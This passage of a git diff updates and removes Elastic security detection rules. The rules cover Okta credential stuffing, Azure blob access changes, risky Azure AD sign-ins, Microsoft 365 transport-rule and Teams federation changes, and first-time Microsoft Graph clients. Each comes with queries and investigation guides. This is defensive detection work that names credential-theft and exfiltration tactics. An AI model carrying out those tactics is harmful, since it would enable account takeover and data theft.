via a proxy for security or privacy reasons.\n- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n", - "query": "FROM logs-okta*\n| WHERE\n event.dataset == \"okta.system\"\n AND (event.action RLIKE \"user\\\\.authentication(.*)\" OR event.action == \"user.session.start\")\n AND okta.debug_context.debug_data.request_uri == \"/api/v1/authn\"\n AND okta.outcome.reason == \"INVALID_CREDENTIALS\"\n| KEEP event.action, okta.debug_context.debug_data.dt_hash, okta.client.ip, okta.actor.alternate_id, okta.debug_context.debug_data.request_uri, okta.outcome.reason\n| STATS\n source_auth_count = COUNT_DISTINCT(okta.debug_context.debug_data.dt_hash)\n BY okta.client.ip, okta.actor.alternate_id\n| WHERE\n source_auth_count >= 30\n| SORT\n source_auth_count DESC\n", - "references": [ - "https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "risk_score": 21, - "rule_id": "23f18264-2d6d-11ef-9413-f661ea17fbce", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - }, - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 204 - }, - "id": "23f18264-2d6d-11ef-9413-f661ea17fbce_204", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json index 2cc3f6277de..9bd34a30522 100644 --- a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json +++ b/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json @@ -23,6 +23,12 @@ "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" ], + "related_integrations": [ + { + "package": "okta", + "version": "^3.0.0" + } + ], "risk_score": 21, "rule_id": "23f18264-2d6d-11ef-9413-f661ea17fbce", "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", diff --git a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_103.json b/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_103.json deleted file mode 100644 index 3d882d715c6..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_103.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies changes to container access levels in Azure. Anonymous public read access to containers and blobs in Azure is a way to share data broadly, but can present a security risk if access to sensitive data is not managed judiciously.", - "false_positives": [ - "Access level modifications may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Access level modifications from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Blob Container Access Level Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Blob Container Access Level Modification\n\nAzure Blob Storage is a service for storing large amounts of unstructured data, where access levels can be configured to control data visibility. Adversaries may exploit misconfigured access levels to gain unauthorized access to sensitive data. The detection rule monitors changes in container access settings, focusing on successful modifications, to identify potential security risks associated with unauthorized access level changes.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific storage account and container where the access level modification occurred, using the operation name \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE\".\n- Verify the identity of the user or service principal that performed the modification by examining the associated user information in the activity logs.\n- Check the timestamp of the modification to determine if it aligns with any known maintenance windows or authorized changes.\n- Investigate the previous access level settings of the container to assess the potential impact of the change, especially if it involved enabling anonymous public read access.\n- Correlate the event with any other recent suspicious activities or alerts in the Azure environment to identify potential patterns or coordinated actions.\n- Contact the owner of the storage account or relevant stakeholders to confirm whether the change was authorized and aligns with organizational policies.\n\n### False positive analysis\n\n- Routine administrative changes to container access levels by authorized personnel can trigger alerts. To manage this, create exceptions for specific user accounts or roles that regularly perform these tasks.\n- Automated scripts or tools used for managing storage configurations may cause false positives. Identify and exclude these scripts or tools from monitoring if they are verified as non-threatening.\n- Scheduled updates or maintenance activities that involve access level modifications can be mistaken for unauthorized changes. Document and schedule these activities to align with monitoring rules, allowing for temporary exclusions during these periods.\n- Changes made by trusted third-party services integrated with Azure Blob Storage might be flagged. Verify these services and exclude their operations from triggering alerts if they are deemed secure and necessary for business operations.\n\n### Response and remediation\n\n- Immediately revoke public read access to the affected Azure Blob container to prevent unauthorized data exposure.\n- Review the access logs to identify any unauthorized access or data exfiltration attempts during the period when the access level was modified.\n- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized access level change and any potential data exposure.\n- Conduct a thorough audit of all Azure Blob containers to ensure that access levels are configured according to the organization's security policies and that no other containers are misconfigured.\n- Implement additional monitoring and alerting for changes to access levels on Azure Blob containers to ensure rapid detection of any future unauthorized modifications.\n- If sensitive data was exposed, initiate a data breach response plan, including notifying affected parties and regulatory bodies as required by law.\n- Review and update access management policies and procedures to prevent recurrence, ensuring that only authorized personnel can modify container access levels.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-read-access-prevent" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "2636aa6c-88b5-4337-9c31-8d0192a8ef45", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Asset Visibility", - "Tactic: Discovery", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1526", - "name": "Cloud Service Discovery", - "reference": "https://attack.mitre.org/techniques/T1526/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1190", - "name": "Exploit Public-Facing Application", - "reference": "https://attack.mitre.org/techniques/T1190/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "2636aa6c-88b5-4337-9c31-8d0192a8ef45_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json b/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json deleted file mode 100644 index cb898fd3c41..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json +++ /dev/null @@ -1,80 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft Identity Protection machine learning and heuristics.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Active Directory High Risk User Sign-in Heuristic", - "note": "## Triage and analysis\n\n### Investigating Azure Active Directory High Risk User Sign-in Heuristic\n\nMicrosoft Identity Protection is an Azure AD security tool that detects various types of identity risks and attacks.\n\nThis rule identifies events produced by the Microsoft Identity Protection with a risk state equal to `confirmedCompromised` or `atRisk`.\n\n#### Possible investigation steps\n\n- Identify the Risk Detection that triggered the event. A list with descriptions can be found [here](https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection).\n- Identify the user account involved and validate whether the suspicious activity is normal for that user.\n - Consider the source IP address and geolocation for the involved user account. Do they look normal?\n - Consider the device used to sign in. Is it registered and compliant?\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\nIf this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:azure.signinlogs and\n azure.signinlogs.properties.risk_state:(\"confirmedCompromised\" or \"atRisk\") and event.outcome:(success or Success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema", - "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection", - "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk", - "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk#investigation-framework" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.signinlogs.properties.risk_state", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "26edba02-6979-4bce-920a-70b080a7be81", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 105 - }, - "id": "26edba02-6979-4bce-920a-70b080a7be81_105", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_414.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_414.json index e6e1723dffe..fcbe579c280 100644 --- a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_414.json +++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_414.json @@ -23,6 +23,12 @@ "https://github.com/0xZDH/Omnispray", "https://github.com/0xZDH/o365spray" ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], "risk_score": 47, "rule_id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_207.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_207.json deleted file mode 100644 index 1275b0e32fa..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_207.json +++ /dev/null @@ -1,92 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses.", - "false_positives": [ - "A transport rule may be modified by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Transport Rule Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Transport Rule Modification\n\nMicrosoft 365 Exchange transport rules manage email flow by setting conditions and actions for messages. Adversaries may exploit these rules to disable or delete them, facilitating data exfiltration or bypassing security measures. The detection rule monitors audit logs for successful execution of commands that alter these rules, signaling potential misuse and enabling timely investigation.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.dataset:o365.audit entries with event.provider:Exchange to confirm the occurrence of the \"Remove-TransportRule\" or \"Disable-TransportRule\" actions.\n- Identify the user account associated with the event by examining the user information in the audit logs to determine if the action was performed by an authorized individual or a potential adversary.\n- Check the event.category:web context to understand if the action was performed through a web interface, which might indicate a compromised account or unauthorized access.\n- Investigate the event.outcome:success to ensure that the rule modification was indeed successful and not an attempted action.\n- Correlate the timing of the rule modification with other security events or alerts to identify any concurrent suspicious activities that might suggest a broader attack or data exfiltration attempt.\n- Assess the impact of the rule modification by reviewing the affected transport rules to determine if they were critical for security or compliance, and evaluate the potential risk to the organization.\n\n### False positive analysis\n\n- Routine administrative changes to transport rules by IT staff can trigger alerts. To manage this, maintain a list of authorized personnel and their expected activities, and create exceptions for these users in the monitoring system.\n- Scheduled maintenance or updates to transport rules may result in false positives. Document these activities and adjust the monitoring system to temporarily exclude these events during known maintenance windows.\n- Automated scripts or third-party tools that manage transport rules might cause alerts. Identify these tools and their typical behavior, then configure the monitoring system to recognize and exclude these benign actions.\n- Changes made as part of compliance audits or security assessments can be mistaken for malicious activity. Coordinate with audit teams to log these activities separately and adjust the monitoring system to account for these legitimate changes.\n\n### Response and remediation\n\n- Immediately disable any compromised accounts identified in the audit logs to prevent further unauthorized modifications to transport rules.\n- Revert any unauthorized changes to transport rules by restoring them to their previous configurations using backup data or logs.\n- Conduct a thorough review of all transport rules to ensure no additional unauthorized modifications have been made, and confirm that all rules align with organizational security policies.\n- Implement additional monitoring on the affected accounts and transport rules to detect any further suspicious activities or attempts to modify rules.\n- Escalate the incident to the security operations team for a deeper investigation into potential data exfiltration activities and to assess the scope of the breach.\n- Coordinate with legal and compliance teams to determine if any regulatory reporting is required due to potential data exfiltration.\n- Enhance security measures by enabling multi-factor authentication (MFA) for all administrative accounts and reviewing access permissions to ensure the principle of least privilege is enforced.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-TransportRule\" or \"Disable-TransportRule\") and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "272a6484-2663-46db-a532-ef734bf9a796", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Exfiltration", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0010", - "name": "Exfiltration", - "reference": "https://attack.mitre.org/tactics/TA0010/" - }, - "technique": [ - { - "id": "T1537", - "name": "Transfer Data to Cloud Account", - "reference": "https://attack.mitre.org/techniques/T1537/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "272a6484-2663-46db-a532-ef734bf9a796_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_207.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_207.json deleted file mode 100644 index 89fc15beb2e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_207.json +++ /dev/null @@ -1,95 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment.", - "false_positives": [ - "Teams external access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Teams External Access Enabled", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Teams External Access Enabled\n\nMicrosoft Teams' external access feature allows users to communicate with individuals outside their organization, facilitating collaboration. However, adversaries can exploit this by enabling external access or adding trusted domains to exfiltrate data or maintain persistence. The detection rule monitors audit logs for changes in federation settings, specifically when external access is successfully enabled, indicating potential misuse.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action \"Set-CsTenantFederationConfiguration\" to identify when and by whom the external access was enabled.\n- Examine the o365.audit.Parameters.AllowFederatedUsers field to confirm that it is set to True, indicating that external access was indeed enabled.\n- Investigate the user account associated with the event to determine if the action was authorized and if the account has a history of suspicious activity.\n- Check the event.provider field to see if the change was made through SkypeForBusiness or MicrosoftTeams, which may provide additional context on the method used.\n- Assess the event.outcome field to ensure the action was successful and not a failed attempt, which could indicate a potential security threat.\n- Look into any recent changes in the list of allowed domains to identify if any unauthorized or suspicious domains have been added.\n\n### False positive analysis\n\n- Routine administrative changes to federation settings can trigger alerts. Regularly review and document these changes to differentiate between legitimate and suspicious activities.\n- Organizations with frequent collaboration with external partners may see increased alerts. Consider creating exceptions for known trusted domains to reduce noise.\n- Scheduled updates or policy changes by IT teams might enable external access temporarily. Coordinate with IT to log these activities and exclude them from triggering alerts.\n- Automated scripts or tools used for configuration management can inadvertently enable external access. Ensure these tools are properly documented and monitored to prevent false positives.\n- Changes made during mergers or acquisitions can appear suspicious. Maintain a record of such events and adjust monitoring rules accordingly to account for expected changes.\n\n### Response and remediation\n\n- Immediately disable external access in Microsoft Teams to prevent further unauthorized communication with external domains.\n- Review and remove any unauthorized or suspicious domains added to the allowed list in the Teams federation settings.\n- Conduct a thorough audit of recent changes in the Teams configuration to identify any other unauthorized modifications or suspicious activities.\n- Reset credentials and enforce multi-factor authentication for accounts involved in the configuration change to prevent further unauthorized access.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Escalate the incident to the incident response team if there is evidence of data exfiltration or if the scope of the breach is unclear.\n- Implement enhanced monitoring and alerting for changes in Teams federation settings to detect similar threats in the future.", - "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTenantFederationConfiguration\" and\no365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoftteams/manage-external-access" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.AllowFederatedUsers", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_1.json deleted file mode 100644 index 6650d10ea1b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_1.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user.", - "false_positives": [ - "Users legitimately accessing Microsoft Graph API using the specified client application ID and tenant ID. This may include authorized applications or services that interact with Microsoft Graph on behalf of users.", - "Authorized third-party applications or services that use the specified client application ID to access Microsoft Graph API resources for legitimate purposes.", - "Administrative or automated tasks that involve accessing Microsoft Graph API using the specified client application ID and tenant ID, such as provisioning or managing resources." - ], - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-azure.graphactivitylogs-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft Graph First Occurrence of Client Request", - "new_terms_fields": [ - "azure.graphactivitylogs.properties.app_id", - "azure.graphactivitylogs.properties.user_principal_object_id", - "azure.tenant_id" - ], - "note": "## Triage and analysis\n\n### Investigating Microsoft Graph First Occurrence of Client Request\n\nThis rule detects the first observed occurrence of a Microsoft Graph API request by a specific client application ID (`azure.graphactivitylogs.properties.app_id`) in combination with a user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) and tenant ID (`azure.tenant_id`) within the last 14 days. This may indicate unauthorized access following a successful phishing attempt, token theft, or abuse of OAuth workflows.\n\nAdversaries frequently exploit legitimate Microsoft or third-party application IDs to avoid raising suspicion during initial access. By using pre-consented or trusted apps to interact with Microsoft Graph, attackers can perform actions on behalf of users without triggering conventional authentication alerts or requiring additional user interaction.\n\n### Possible investigation steps\n\n- Review `azure.graphactivitylogs.properties.user_principal_object_id` and correlate with recent sign-in logs for the associated user.\n- Determine whether `azure.graphactivitylogs.properties.app_id` is a known and approved application in your environment.\n- Investigate the `user_agent.original` field for signs of scripted access (e.g., automation tools or libraries).\n- Check the source IP address (`source.ip`) and geolocation data (`source.geo.*`) for unfamiliar origins.\n- Inspect `azure.graphactivitylogs.properties.scopes` to understand the level of access being requested by the app.\n- Examine any follow-up Graph API activity from the same `app_id` or `user_principal_object_id` for signs of data access or exfiltration.\n- Correlate with device or session ID fields (`azure.graphactivitylogs.properties.c_sid`, if present) to detect persistent or repeat activity.\n\n### False positive analysis\n\n- First-time use of a legitimate Microsoft or enterprise-approved application.\n- Developer or automation workflows initiating new Graph API requests.\n- Valid end-user activity following device reconfiguration or new client installation.\n- Maintain an allowlist of expected `app_id` values and known developer tools.\n- Suppress detections from known good `user_agent.original` strings or approved source IP ranges.\n- Use device and identity telemetry to distinguish trusted vs. unknown activity sources.\n- Combine with session risk or sign-in anomaly signals where available.\n\n### Response and remediation\n\n- Reach out to the user and verify whether they authorized the application access.\n- Revoke active OAuth tokens and reset credentials if unauthorized use is confirmed.\n- Search for additional Graph API calls made by the same `app_id` or `user_principal_object_id`.\n- Investigate whether sensitive resources (mail, files, Teams, contacts) were accessed.\n- Apply Conditional Access policies to limit Graph API access by app type, IP, or device state.\n- Restrict user consent for third-party apps and enforce admin approval workflows.\n- Monitor usage of new or uncommon `app_id` values across your tenant.\n- Provide user education on OAuth phishing tactics and reporting suspicious prompts.\n", - "query": "event.dataset: \"azure.graphactivitylogs\"\n and event.type: \"access\"\n and azure.graphactivitylogs.properties.c_idtyp: \"user\"\n", - "references": [ - "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.graphactivitylogs.properties.c_idtyp", - "type": "unknown" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Graph", - "Data Source: Microsoft Graph Activity Logs", - "Resources: Investigation Guide", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - 